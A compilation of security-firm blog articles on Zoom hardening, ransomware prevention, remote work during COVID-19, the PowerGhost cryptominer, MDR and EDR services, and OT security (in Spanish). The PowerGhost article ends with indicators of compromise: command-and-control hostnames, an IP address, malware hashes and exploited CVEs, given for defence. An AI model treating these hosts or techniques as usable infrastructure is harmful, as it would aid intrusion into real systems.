Recommendations for Secure Zoom Sessions

Many organizations and professionals are having increased security concerns while using Zoom as a Conferencing platform. However, it is difficult to switch platforms because of investments, user experience, and past practices. ETEK Security Advisory experts are providing the following 7 Key Technical and Zoom Tool Management Recommendations to use Zoom securely:

  1. Updates: All platforms are on continuous improvement, developing new operating and security features. Zoom is no exception and recommends users hosting a new meeting, to click on the toolbar “update our app” and select new updates and install the same all devices that are connected to the session
  2. Passwords and Session Id: When you create a new session, the app creates a PMI, this is a number that you can distribute for one or many users however it’s highly recommended to generate unique ID per user despite PMI. I also recommend generating a password per session.
  3. Administrator or Moderator Control: It’s important to assign one moderator role for each of meetings or meetiings where participants beyond your trust network will join. You can make the registration mandatory and the moderator is ready to check people trying to get into the meeting and block ones perceived as strangers, annoying or potential threats. 
  4. Leverage Waiting Room: We recommend setting up waiting rooms to validate trusted invitees before the moderator allow invitees in the session. 
  5. Screen sharing Control: Recommend having “Host” control of sharing the screen. You can configure that feature with simple steps of: Personal > Settings > In Meeting (Basic) and look for Screen sharing.
  6. Block Session: We recommend blocking all sessions once the meeting has started. You also have options to block video if required. 
  7. File-Sharing Control: We recommend blocking features of use “Animated GIFs, files on chat, and as well as sharing general files” when you are hosting the meeting. The feature mentioned is not by default and we recommend checking below link: https://support.zoom.us/hc/en-us/articles/209605493-In-Meeting-File-Transfer?zcid=1231 https://support.zoom.us/hc/es/articles/209605493-Transferencia-de-archivos-durante-la-reuni%C3%B3n

Important Note:

It is possible during these days to get involved in APT (Advanced Persistent Threat) campaigns or trojans spread during this time. Cybercriminals are trying to trick users with the download of software that seems to be original with malware inside. We recommend users to download Zoom from the official website and use the App Store or Google Play with the configuration setting of download only from official and secure sources.

 

By. Iván Camilo Castellanos

RANSOMWARE Attacks Can be Managed

What is Ransomware?

Ransomware is a malicious software program (Malware) that seeks to infect machines, blocking access to read files, boot zones, devices as such, and in general any type of critical feature to claim or ask for a reward to release said features already mentioned.

What is the cause of Ransomware Attacks? 

  • Navigation: Browsing malicious sites and downloading plugins.
  • Phishing: Getting an email with links that look like trusted sites and making users compromise the security.
  • External drives: Plugging external infected drives to your machines and getting infected.
  • Downloading Malicious content: Downloading music, free software, .exe from untrusted sites.
  • Social Engineering: By social engineering techniques that convince the user to be a trusted provider and execute the malicious action.
  • P2P Connections P2P connections for music download or free software.

How to proactively prevent Ransomware Attack?

  1. Backups: It is recommended to have a strict backup policy so that if you are a victim you can recover from the attack.
  2. Awareness: Educate user to
    • Always validate the legitimacy of the site they browse
    • Do not download software from an untrusted P2P network
    • Simulated phishing attacks to check end user preparedness
    • Not open links or attachments of emails whose origin is unknown.
    • On cell phones, enable the option only to download from reliable sites
  3. EDR: It is important to go ahead with Next-generation AntiVirus (NGAV) and Endpoint Detection and Response (EDR) with proactive protection.
  4. Centralized Teleworker Policy Deployment: Ensure teleworkers have the right level of policy controls on their website, application and data governance
  5. Threat Assessment: Continuous validation of vulnerabilities on End Points. 

If you need more help, please reach out to the ETEK advisory team. We can assess the gaps, provide solutions to fix the issues, and perform proactive simulated attacks to test the resilience of your architecture. Please contact at ecoadvisory@etek.com.co ecoadvisory@etek.com.co

By.  Iván Camilo Castellanos

        Praveen Sengar

COVID 19 – SURVIVAL OF THE AGILIST

“It is not the strongest who will survive, but those who can best manage change” this quote resonated well with me when the COVID-19 crisis hit us. We were clear that to survive, we need to adapt, innovate and think out of the box.  

In the last 4 weeks, we executed on multiple fronts and are sharing some experiences that can help other privileged people like us, who can operate remotely. 

Clients: Living by one of our values– Client Centricity, we focused on our client’s core needs by creating a COVID-19 response portfolio – Connectivity, Productivity, End User Protections, Incident response, and End User Awareness.

ETEK’s team responded quickly to our client’s urgent remote working needs and deployed VPN solutions for 40+ clients. For clients with infrastructure constraints, we provided a cloud-based, zero-trust, #Netfoundry #SASE solution. We did 5+ POC and enabled 2000 users to work from home, across 2 large Conglomerates in 3 days. The cross-functional task force scaled to the client’s urgent requests. 

As the number of incidents and threats increased, it was important to help clients. Our Advisory team helped clients make informed decisions quickly, leveraging ETEK Security Labs. ETEK organized 7 webinars for clients on Connectivity, Productivity, End-User Protection, Incident Response, and End User Awareness. We touched 200+ clients in 4 weeks. ETEK continues to expand our “as a service ” offerings, launching WAF, IAM as a service and cloud migration service by May 2020.

ETEK issued essential service passes to all onsite engineers to attend to any client emergency, while they are working remotely. 

Employees: Once we saw the number of COVID 19 cases rising on March 13th, we decided to work from Home, a week before the government-mandated complete lockdown. The strikes in Colombia had prepared us better for this eventuality. 

The team experienced some issues in 1st week. However, most employees responded well. To my surprise the organization’s productivity went up, the team was focused and effective. We organized multiple all company meetings, connecting 240 employees across Colombia and Peru, discussing the situation, addressing fears and how we are responding to the crisis. 

HR team shifted gears launching new well-being programs such as Yoga and Meditation. Meanwhile, the focus continues to aggressively execute role-specific training and development programs in line with the organization’s new vision. 

Management Team: Initially, it was hard for me to not have boundaries between family and work. The entire management team stretched to working 14-16 hour days. We realigned our Portfolio, key verticals and addressed some client situations. Management decided not to terminate any employees and to take a voluntary pay cut. We also decided to implement work from Home as a policy and restructured our office space, reducing our operating expenses.Community: We all must stand together to fight this crisis. ETEK will donate 5% of the gross margin of connectivity and productivity solutions sold in Colombia to the Corona Foundation (Fundación Corona). 

By.  Praveen Sengar

Cryptomining and the impact on business environments in Latin America

Cryptomining via malware has become the preferred strategy of cybercriminals to quickly and effectively monetize their efforts. With the increase in prices and types of crypto currencies, as well as the difficulty of detecting these programs, ideal conditions have been created for their appearance in markets such as Latin America.

Over the past few years, threats have evolved at a considerable speed, almost in exponential terms, and it is to this very extent that organizations have an increasingly wider scope to protect.

Strategies designed to use once-functional technologies have led to a false sense of security. For example, when traditional endpoint protection tools generate a large number of reports indicating that a significant number of malicious codes have been identified and cleaned up, it suggests that one is fully protected and undermines the importance of improving the cybersecurity posture.

Unfortunately, if there is no malicious code that, when exploited, generates a visible impact on the organization, it would be almost impossible to understand the need to improve and/or develop the existing security controls.

The need for tools such as firewalls, anti-virus (anti-malware), WAF, IPS and others is in no way disputed. These are tools that are part of the layered protection in an in-depth defense model; however, those threats that are capable by means of one or another technique (obfuscation, fileless, logical bomb, wrapping among others) of avoiding the basic controls also require special attention, even worse if they are silently on the network, perhaps taking control of one or several computers, modifying files, extracting information, perhaps cryptomining or in the worst case intercepting communications.

One of the new trends in terms of improving the cybersecurity position and that is quite rightly designed to deal with those threats that have and continue to evolve is Threat Hunting.

Threat hunting can be defined as the continuous iteration within the network to search for advanced threats, their likely detection and isolation, whose outcome should be seen as a proactive analysis given the nature of the process already described.

This proactive approach covers the great gap with other types of tools that are usually more reactive, which are usually used once the attack or incident has happened.

It can be easily explained from a security incident, if you think from a reactive perspective, this incident can happen starting from the assumption of an event that generated an impact on the organization and which the different security tools would allow us to understand what happened, then fine-tune the levels of detection and control, either by creating new rules, activating some new type of feature or simply downloading an extra updated signature package; now if we think from the proactive perspective or Threat Hunting, the incident starts from the gathering and continuous analysis of the normal activity of the network and its possible deviations, understanding that perhaps possible access to system files, opening of ports, execution of powershell, reading of folders, modification of registry keys or simple connectivity with certain sites, can be new indicators of compromise and thus must be treated after an intense process of security telemetry that must profile in the most accurate way the devices, users, networks and/or the traffic of the company.

There has been ongoing discussion in the world of cybersecurity about ” cryptomining ” and its impact on corporate environments. To understand this, it is necessary to clarify the definition of cryptocurrencty:

“A cryptocurrency is a type of digital currency based on cryptography. It uses encryption techniques to generate units and verify its transactions as a substitute of a central authority”

Because it relies on cryptography, the creation of these currencies depends on highly complex calculations that require a combination of computer resources. For this reason, from home users to corporate users, all have been victims of the wave of crypto-currency mining networks, the latter being the main target of these campaigns due to the high computational power they have to offer their different services to their customers (e.g. transactional portals, ERPs, CRMs, among others). Their creation can be summarized as follows:

  • The first step in cryptomining is to join a network that has its technological foundations in the use of  blockchain. It is possible to join willingly or unwillingly through the deliberate download of mining software, or even through the infection by malware sent by an attacker using different means (email, USB, photos, among others). https://www.welivesecurity.com/la-es/2017/07/28/claves-potencia-del-bitcoin/
  • Once inside a mining network, the role of each member is to execute certain complex mathematical operations that require considerable computing power. For the contribution and the possible success of its validations, a percentage of a crypt-currency is assigned to each member. Let’s imagine that for providing our laptop to perform mathematical operations we were paid 100 dollars a day (assuming a great success rate in the mathematical processes performed thereby).
  • In order to store the earnings, it is necessary to have a pocket, or wallet, in which the percentages of cryptomonies resulting from the success of the mathematical computations will be collected.

To understand the widespread nature of these campaigns, it is important to be aware of the growth in the value of cryptomonies at the end of 2017.

Definitely this skyrocketing price of crypto currencies became a wake-up call for cybercriminals, showing that there are opportunities to make money. As a result, this generated a change in the modus-operandi of different cybercriminals.

The impact of crypto-mining may not be as well advertised in the media compared to the different types of ransomware variations (among them the most resounding “Wannacry”); however, in terms of technological operation for companies, this type of malware (CRYPTOMINERS) may have an impact greater than or equal to ransomware.

By understanding the operation of a cryptomining network, it is relatively easy to deduce why attackers are interested in executing mining campaigns on business environments. The devices used for the delivery of services to users and/or clients handle a large amount of data, for which it is necessary to have quite robust and high-performance computer systems that can be used to considerably increase the probability of obtaining crypto-currencies. It is important to take into account that these resources can be exploited by third parties with malicious intentions or by internal personnel with administration privileges on these devices, so the mitigation efforts implemented must cover the internal vector, the misuse of administrators on their devices in charge, an angle that sometimes is not supervised by the organizations.

New malware markets: from information “hijacking” to crypto-mining campaigns

Ironically, having ransomware and having it exploited provided certainty, “the system had been compromised”; however, in cryptomining it is difficult to have that level of certainty: the attacker is much more silent, the method of infection can be similar to that of any other malware (e.g WannaCry), where the connection pivot was generated from a “dropper”[1] that executes the malware with the ability to execute activities on the target system undetected and even elevating privileges for writing and reading information. In many cases the same vulnerability used or exploited to spread ransomware can be used to spread crypto-mining (EternalBlue).

Clearly the motivations for misusing technological resources are not insignificant and this condition establishes that a wide scope of threats will grow exponentially. The malware market has evolved from “hijacking” information to generating revenue through crypto-mining.

What are the trends in the region regarding cryptomining?

The main problem of the region is ironically not a technological one, it is a cultural matter. For some reason people tend to think that these types of incidents do not have a local impact, which is a topic that only concerns countries like the United States, Russia or China. Recent events have revealed attacks of this kind in Latin American corporate environments, focusing particularly on countries such as Brazil, Colombia, Mexico, Peru and Ecuador. The most recent one is called PowerGhost.

This is a type of Trojan that has been designed to install any type of malware on a target system.

According to the research of several security vendors and confirmed by ETEK International’s cyberlab, this malware uses a combination of PowerShell and spreading via Ethernalblue (the same one used to spread ransomware in many occasions).

In the analysis carried out, it was established that this type of code is capable of hiding behind apparently legitimate software and avoiding security controls. Other identified patterns are:

  • Malicious behaviour and opening of random ports.
  • Use of post-exploitation techniques such as MIMIKATZ to elevate privileges and search for other propagation vectors (even compromising user credentials and information).
  • Use of evasion, anti-debugging and anti-sandboxing techniques
  • Other indicators of compromise are listed in the appendix of this article.

The main recommendations to be taken into consideration to mitigate or deal with these types of events are:

  • Apply on a regular basis the security updates delivered by the different vendors. It sounds redundant, but it is the first preventive measure that can be applied. These attacks continue to exploit those vulnerabilities that have massively affected large companies in the past, which are still persistent (ETERNALBLUE) and make a company a target for attack due to its level of exposure.
  • Prevent users from accessing sites with a low trust rating, and where the installation of some kind of software add-on is suggested.
  • Keep IPS and anti-malware signatures updated, making regular campaigns.
  • Deploy security intelligence models with event correlation. They can be implemented with different technological solutions or contracted as a managed security service through a Security Intelligence Center
  • Modeling network traffic, identifying behavioral baselines that enable anomalies to be flagged.
  • Monitor the actions executed on critical devices by administrators and other privileged users.
  • Periodically evaluate new protection services to prevent, detect and contain this type of threat. Always check with your strategic information security partner for new market trends, this will allow you to have the best security guidelines related to your business.

Appendix

Indicators of compromise.

C&C hostnames:

update.7h4uk[.]com

185.128.43.62

info.7h4uk[.]com

Malware MD5:

AEEB46A88C9A37FA54CA2B64AE17F248 =  https://threatexplorer.bluecoat.com/v2/tex#/file?q=AEEB46A88C9A37FA54CA2B64AE17F248

4FE2DE6FBB278E56C23E90432F21F6C8 = https://www.virustotal.com/#/file/f90bcf5b649ebb61d1b2a1a973c04312e3e72a71d4393ccbb12b9fa593637d62/detection

71404815F6A0171A29DE46846E78A079 = https://www.virustotal.com/#/file/a467974c13cbee341c08fd0a51c28bf7cc7e482ff078a9d0ed96371b2ced5d95/detection

81E214A4120A4017809F5E7713B7EAC8 = https://www.virustotal.com/#/file/e5d45d5dd213704a6f4a50db85717a6901cfe968eaa6cf9742480cf6c99ee51d/detection

Related containment signatures:

HTTP: Microsoft Win32k Elevation of Privilege Vulnerability (CVE-2018-8120).

NETBIOS-SS: Windows SMB Remote Code Execution Vulnerability (CVE-2017-0144).

Don’t forget all those related to vulnerability MS17-010.

References

Mining is the new black – https://securelist.com/mining-is-the-new-black/84232/

A mining multitool – https://securelist.com/a-mining-multitool/86950/

Fileless Malware PowerGhost Targets Corporate Systems –https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/fileless-malware-powerghost-targets-corporate-systems

PowerGhost: nuevo minero de criptomonedas apunta a redes corporativas de América Latina – https://latam.kaspersky.com/blog/powerghost-nuevo-minero-de-criptomonedas-apunta-a-redes-corporativas-de-america-latina/13206/

5 claves para entender la potencia del bitcoin – https://www.welivesecurity.com/la-es/2017/07/28/claves-potencia-del-bitcoin/

MDR Service Definitions

What is MDR?

The purpose of MDR services is to quickly identify and reduce the impact of security incidents on customers. These services focus on 24/7 monitoring, detection and targeted threat response activities. In ETEK we use a combination of host and network layer technologies as well as advanced analysis, threat intelligence, forensic data and human expertise for investigation, threat research and response to detected threats.

MDR services

  • Monitoring and threat detection: Dedicated monitoring to look for traces of security threats.
  • Incident response: Initial automated response capabilities supported by playbooks.
  • Threat Hunting: Continuous search for cyber threats that are not detected by traditional security controls.

Incident Management

  • Event: Observable occurrence in a system or network
    • A user connecting to a shared resource
    • A user sending an e-mail message
    • Blocking a connection attempt through a firewall
  • Incident: Actual or imminent violation of an organization’s information security policies
    • Users are tricked into opening a “legitimate” report and infecting them with a malicious program (Malware).
    • Connecting workstations to addresses recognized as command and control (C&C) centers.
    • A user sending an e-mail message.
    • Unavailability of services due to malware attacks

Use Cases and Playbooks

  • Use case: Service designed to improve the way companies detect threats, respond to incidents, and monitor their IT assets continuously
  • Playbook: A Playbook is a checklist with the steps and actions needed to successfully respond to specific incident types and threats. Incident response Playbooks provide a simple step-by-step, top-to-bottom orchestration approach. They help to establish formalized incident response processes and procedures within investigations and can ensure that the steps are systematically followed.

Risks that are mitigated with MDR services

  • Loss of or lack of access to data required for the operation
  • Data leakage that is stored and shared massively that can lead to the disruption of the business operations.
  • Loss of data confidentiality and its further disclosure that may benefit the competition
  • Loss of customers due to theft and unauthorized disclosure
  • Reprocessing that may affect the organization’s productivity.
  • Unauthorized modification of content of files.
  • Data availability loss due to configuration information exposure and available ports
  • Carry out cyber attacks on the identified addresses and ports
  • Leakage of data that is stored and shared that can lead to business disruption
  • Financial loss due to either losing customer or lawsuits
  • Flaws in access to information required for the business operations

Teams featured in MDR

  • Red Team: Emulates attacks on the enterprise security posture to measure the effectiveness of its security controls.
    • Functions
      • The Red Team performs a process of emulating threat scenarios that an organization may face.
      • It generates indicators of compromise for new attacks.
      • Use case testing.
      • Supports the Blue Team in developing customized scenarios for client demos.
    • Services
      • Ethical hacking
      • Vulnerability analysis
      • Cybersecurity compliance
      • Social Engineering
      • Exploiting fraud vectors.
      • Malware scenarios
  • Blue Team: Responsible for executing computer network defense activities in a company’s information system.
    • Functions
      • The main objective of the Blue Team is to perform assessments of the diverse threats that can affect organizations.
      • Monitor security activities (network, systems, etc.)
      • Suggest action plans to mitigate risks.
      • Incident response.
      • Forensic analysis
      • Establishing detection measures for future cases
    • Services
      • Event Correlation
      • Incident response.
      • Configuration of use cases and Playbooks.
      • Availability Monitoring
      • SIEM rules tune-up.
  • Purple Team: They work to ensure and maximize the effectiveness of the Red and Blue teams. They do this by integrating Blue Team’s defensive tactics and controls with the threats and vulnerabilities identified by the Red Team
    • Functions
      • The main purpose of a Purple Team is to manage the security of the organization’s assets
      • Perform tests to check the effectiveness of security mechanisms and procedures
      • Define/develop additional security controls to reduce the risk of the organization.
      • Playing the role of facilitator between both teams, Red & Blue
    • Services
      • Enables improvements in detection and defence
      • Defines Use Cases.
      • Defines Playbooks.
      • Create strategies based on customer needs.

Overview of MDR service components

  • Proactive Support
    • Proactive monitoring
    • knowledge of customer service architecture and CMDB
    • Use cases knowledge base up-to-date
    • Continuous CyberWar Exercises
  • Managed Services
    • Device management leveraged by proactive detection and automation capabilities
    • Threat hunting
    • Incident response based on best practices
    • Staff with multiple skills and certifications
  • Demonstration videos
  • Contact us
  • Brochures and papers
  • Successful cases

Next generation endpoint protection EDR (Endpoint Detection and Response)

Not only have cyberthreats increased in numbers, but also in complexity. Hacking campaigns that a few years ago were intended to exploit certain fairly well known code have become structured and chameleon-like processes, capable of studying a network and its vulnerabilities before exploiting them. Therefore, solutions based on the behavior analysis of malicious codes already known in the ENDPOINT (call servers, PCs, Tablets, Mobiles among others) had to evolve.

A new suite of tools designed to defend the ENDPOINT against those threats, which are becoming more specialized every day, are essential for the new cyberdefense strategies of any company, these solutions are known as EDR (Endpoint Detect and Response) and have become one of the most important defense trends in the cybersecurity market, changing the reactive perspective towards security incidents for a proactive approach that focuses on the secure operation of companies. This concept linked to proactivity is known as THREAT HUNTING and is a trend that is growing in the industry, and can be seen or applied in many layers, ENDPOINT, NETWORK, APPLICATION, among others.

In recent years, threats have evolved at a considerable speed, almost in exponential terms, and it is to this same extent that organizations have amplified their levels of exposure. The needs of digital transformation, e-commerce, connectivity trends, among others, have led to an equation whose result is none other than an increasingly broad and complex technological spectrum to protect.

Strategies oriented towards the use of technologies that were once considered functional have led to a false perception of security. For example, when the traditional protection tools of ENDPOINT generate a large number of reports indicating that a significant number of malicious codes have been identified and cleaned up, it suggests that the user is completely protected and undermines the relevance of improving the cybersecurity posture.

Unfortunately, if there is no malicious code or “viruses”, which when exploited generate a visible impact on the organization, it would be almost impossible to understand the need to improve and/or evolve existing security controls.

By no means does it diminish the need for tools such as firewalls, anti-virus (anti-malware), WAF, IPS among others. These are tools that are part of the protection layers in a in-depth defense model that every company should have today; however, what happens with those threats that are capable through one or another technique (obfuscation, fileless, logical bomb, wrapping among others) to avoid the basic controls, they also require special attention, even worse if they are silently on the network, perhaps taking control of one or more computers, perhaps servers, modifying files, extracting information, perhaps cryptomining or in the worst case intercepting communications.

One of the new trends in cybersecurity posture improvement that is quite successful in addressing those threats that have and continue to evolve is Threat Hunting.

But what is threat hunting?  

Threat hunting can be defined as the continuous iteration within the network to search for advanced threats, their likely detection and isolation, whose outcome should be seen as a proactive analysis given the nature of the process already described.

This proactive approach covers the great gap with other types of tools that are usually more reactive, which are usually used once the attack or incident has happened.

It can be easily explained from a security incident, if you think from a reactive perspective, this incident can happen starting from the assumption of an event that generated an impact on the organization and which the different security tools would allow us to understand what happened, then fine-tune the levels of detection and control, either by creating new rules, activating some new type of feature or simply downloading an extra updated signature package; now if we think from the proactive perspective or Threat Hunting, the incident starts from the gathering and continuous analysis of the normal activity of the network and its possible deviations, understanding that perhaps possible access to system files, opening of ports, execution of powershell, reading of folders, modification of registry keys or simple connectivity with certain sites, can be new indicators of compromise and thus must be treated after an intense process of security telemetry that must profile in the most accurate way the devices, users, networks and/or the traffic of the company.

Graphic description of the difference between Threat Detection and Theat Hunting

However, it is precisely on the hypothesis and the analysis of the “Data” shown in Illustration 1 and obtained from the ENDPOINT that the EDR tools are succeeding.

EDR strategies are based on the use of tools of this nature, where they monitor the ENDPOINT and its associated network traffic, taking this input to a database that is very different from that of traditional anti-virus tools. In this database, the processes associated with security telemetry are carried out, which are supported by the organization’s real data analysis tools; not signatures or generic patterns.

The analysis provided by this type of tools allows not only a real approach to the security situation of the ENDPOINT but also an improvement in the security posture by diverting or containing attacks based on the early identification of internal and external threats.

Technically speaking, a workstation that launches an anomalous process, generates a change over some kind of registry key that had not been presented before, opens high ports for connections or considerably increases the size of a system process where there is some kind of wrapping, will be associated by the advanced analysis of the EDR as a target for research and quick response; a task that traditional endpoint protection does not cover due to its signature validation and/or heuristic base nature. It is not intended to detract from the value of antivirus tools but to complement the protection and response efforts of the ENDPOINT, that is the meaning of an EDR. 

It is important to understand that not only an EDR strategy is based on what the tool can deliver, it is also important to consider the research sources that support those tools and at the same time generate the new indicators of compromise. Therefore, it is recommended during the hunting strategy immersion processes, to follow up the acquisition of technologies with research groups that have the skills to read, research and feed the indicators of compromise specific to each organization.

References

What is Endpoint Detection and response – https://digitalguardian.com/dskb/endpoint-detection-response

FireEye Endpoint security – https://www.fireeye.com/content/dam/fireeye-www/products/pdfs/pf/ep/ds-endpoint-security.pdf

¿Qué es Thraat hunting y porque es necesario? – https://www.pandasecurity.com/spain/mediacenter/adaptive-defense/threat-hunting-por-que-necesario/

Endpoint Detection and response Architecture and Operations practices. – https://www.gartner.com/doc/3895048/endpoint-detection-response-architecture-operations

Security in OT (Operational Technologies)

La velocidad con la que avanza la tecnología va en paralelo a la aparición de nuevas vulnerabilidades y amenazas que pueden comprometer significativamente a la infraestructura de las compañías. Los sistemas industriales y de operación no son ajenos a estas amenazas, por lo que es necesario implementar programas de seguridad que busquen mitigar los riesgos de ciberseguridad en sistemas OT. En el presente artículo se muestra de forma general las características propias de los sistemas industriales y algunas recomendaciones de seguridad y monitoreo para las mismas.

Las tecnologías de operación (OT) enmarcan sistemas de control industrial (ICT por sus siglas en inglés) como redes SCADA compuestas de DCS (sistemas de control distribuido), RTU (Remote Terminal Units) y PLCs (Programmable Logic Controller) para garantizar interconectividad, control y monitoreo de dispositivos industriales como válvulas, motores, actuadores, entre otros, los cuales son ampliamente usados en industrias como petróleo/gas, generación y transporte eléctrico, tratamiento de aguas, manipulación química, etc.

Debido a que las tecnologías de operación involucran procesos físicos, cualquier impacto sobre el funcionamiento y operación, puede afectar negativamente al ambiente a su alrededor incluyendo la liberación de materiales peligrosos, generación de explosiones, daños ambientales permanentes que potencialmente pueden causar perjuicios a la integridad de las personas que estén cercanos al proceso. Por estos motivos, es necesario invertir en la protección de OT mediante un esquema de seguridad que disminuya la probabilidad de la materialización de riesgos relacionados a ciberseguridad  y evitar tener impactos físicos, económicos y sociales.

Los sistemas OT demandan Disponibilidad, Integridad y Confidencialidad (en este orden de prioridades) como premisas para la seguridad, y al igual que las redes IT es necesario crear programas de manejo de riesgos, respuesta ante emergencias y constante monitoreo de la postura de seguridad.

El proceso de manejo del riesgo debe realizarse usando el enfoque three-tiered como se presenta en la Figura 1, (i) nivel organizacional, (ii) nivel de procesos de negocio o misionales y (iii) nivel de sistemas (IT y OT).  Estos deben proveer la habilidad para identificar, evaluar, responder y monitorear riesgos relacionados a la ciberseguridad y proveer a las organizaciones herramientas para la toma de decisiones basado en los riesgos. Como ejemplos de estos procesos de manejo de riesgo para OT se encuentran la publicación especial de la NIST 800-82 (Guide to Industrial Control Systems (ICS) Security), NIST (SP) 800-39 y la guía para el manejo de los riesgos en el sector Electrico  (Electricity Sector Cybersecurity Risk Management Process (RMP) Guideline)

El ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) en conjunto con diferentes equipos CERT (Computer Emergency Response Teams) ofrecen recomendaciones para controlar incidentes relacionados a sistemas OT así como medidas de mitigación de amenazas. Es importante que las compañías que poseen sistemas OT constantemente estén actualizadas con el conocimiento de los orígenes e impactos de nuevas amenazas, vulnerabilidades y aplicar los consejos emitidos por estas entidades,

Implementar controles de seguridad en sistemas OT es una labor ardua debido a sus características intrínsecas de arquitectura distribuida de los sistemas ICS. En la Figura 2 se presenta un ejemplo de una topología en la cual se evidencia que se pueden tener diferentes equipos y tecnologías en los sitios remotos, formas diversas de comunicación WAN o inter-sitios y un centro de control comúnmente aislado geográficamente de los procesos.

La definición de arquitecturas de seguridad en ICS debe realizarse teniendo en cuenta:

  1. Segmentación y segregación de la red: Debido a la naturaleza de trafico de redes OT e IT, es recomendado separarlas y que tengan el mínimo contacto para garantizar homogeneidad y gobierno sobre las mismas. Si se requiere que la conectividad IT/OT se establezca, es recomendable que esta sea mínima realizando filtros e inspecciones por Firewalls permitiendo únicamente puertos para las comunicaciones especificas bajo la premisa de menores privilegios de acceso.
  2. Protección de perímetros: La transferencia de información entre dominios de seguridad con diferentes políticas representa un riesgo ya que estas transferencias pueden violar uno o varios dominios. Es necesario implementar controles de protección en los perímetros mediante Firewalls, Gateways, HIPSs y NIPS, túneles, entre otros teniendo las siguientes premisas:-
    • Por defecto denegar todo el tráfico y permitir como excepción
    • Implementar equipos intermediarios tipo proxy para tráfico a dominios externos.
    • Implementar tecnologías de inspección profunda de tráfico.
    • Aplicar controles de acceso físico a componentes de los sistemas OT.
    • Implementar monitoreo pasivo de las redes ICS para detector comunicaciones anómalas y generar alertas.
  3. Defensa en profundidad: Es altamente recomendable implementar estrategias de seguridad por capas similar a las arquitecturas para redes IT teniendo en cuentas las siguientes características en OT:
    • Los antivirus y software de seguridad en equipos finales no son comunes y es imposible en muchos casos implementarlos.
    • Las operaciones de instalación de parches no son frecuentes.
    • El manejo de cambios es bastante complejo y difícil de lograr por las áreas de operacion.
    • Se exige disponibilidad 24x7x365.
    • Se tiene poca conciencia de seguridad; comúnmente se ven programas de seguridad física pero no lógica.
    • El impacto de alguna afectación de un servicio es critica y puede llevar a consecuencias legales, físicas o sociales.
    • La auditoria o pruebas de posturas de seguridad no son frecuentes.

Algunas herramientas de control y seguridad implementadas en redes IT funcionan adecuadamente en OT, sin embargo, existen compañías especializadas para estos sistemas que ofrecen el monitoreo y control adecuado en dispositivos industriales como Sentryo (recientemente adquirida por Cisco), Claroty, Veracity industrial networks, Dragos, entre otras. Estas empresas tienen convenios con las grandes marcas y fabricantes de dispositivos OT como Emerson, Honeywell, Rockwell Automation, Schneider, Siemens, etc. para garantizar interoperabilidad de las plataformas, dispositivos y herramientas de seguridad.

En conclusion, la implementación de programas de Seguridad en redes y sistemas OT es importante, debido a las características propias de la industria y el constante aumento de ataques y amenazas en contra de estos sistemas; Stuxnet fue un punto de inflexion en la industria debido a que marcó hitos históricos en cuanto a desarrollo de malware especializado en equipos industriales, por esto es mandatorio que las políticas de seguridad corporativas, implementación de monitores especializados, análisis y manejo de riesgos cibernéticos sean constantemente actualizados y analizados por equipos especializados al interior de las compañías.

References

Thanks for your message , we will reply soon

Message sent

succesfully!

Gracias por tu mensaje , pronto responderemos

¡Mensaje enviado

con éxito!